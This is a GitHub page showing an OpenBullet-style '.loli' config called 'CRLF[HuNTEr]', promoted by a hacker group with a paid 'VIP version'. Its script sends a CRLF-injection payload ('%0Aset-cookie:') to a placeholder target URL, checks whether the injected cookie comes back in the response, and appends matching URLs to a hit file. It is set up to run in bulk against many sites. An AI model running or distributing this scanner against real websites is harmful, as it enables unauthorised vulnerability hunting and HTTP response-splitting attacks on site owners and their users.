-
Notifications
You must be signed in to change notification settings - Fork 0
/
CRLF.loli
56 lines (50 loc) 路 1.68 KB
/
CRLF.loli
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
[SETTINGS]
{
"Name": "CRLF[HuNTEr]",
"SuggestedBots": 50,
"MaxCPM": 0,
"LastModified": "2022-10-08T10:53:43.8647608+01:00",
"AdditionalInfo": "CRLF Hunter Free !*_*! Contact @mar2_alpha for VIp Version !*_*! our group: @GreyH4tHackers",
"RequiredPlugins": [],
"Author": "l4gtr4",
"Version": "1.2.2",
"SaveEmptyCaptures": false,
"ContinueOnCustom": false,
"SaveHitsToTextFile": false,
"IgnoreResponseErrors": true,
"MaxRedirects": 8,
"NeedsProxies": false,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"BanLoopEvasionOverride": -1,
"EncodeData": false,
"AllowedWordlist1": "",
"AllowedWordlist2": "",
"DataRules": [],
"CustomInputs": [],
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"QuitOnBanRetry": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://<URL>/%0Aset-cookie:%20hello=l4gtr4;"
HEADER "Connection: Keep-alive"
HEADER "Accept-Encoding: gzip,deflate"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21"
HEADER "Accept: /"
KEYCHECK
KEYCHAIN Failure OR
KEY "<HEADERS(*)>" DoesNotContain "l4gtr4"
KEY "<COOKIES(*)>" DoesNotContain "l4gtr4"
KEYCHAIN Success OR
KEY "<HEADERS(*)>" Contains "l4gtr4"
KEY "<COOKIES(*)>" Contains "l4gtr4"
PARSE "" LR "" "" CreateEmpty=FALSE -> CAP "" "" "!^~^! Target maybe Vulnerable to CRLF Injection !^~^!"
UTILITY File "CRLF.txt" AppendLines "https://<URL>/%0Aset-cookie:%20hello=l4gtr4;"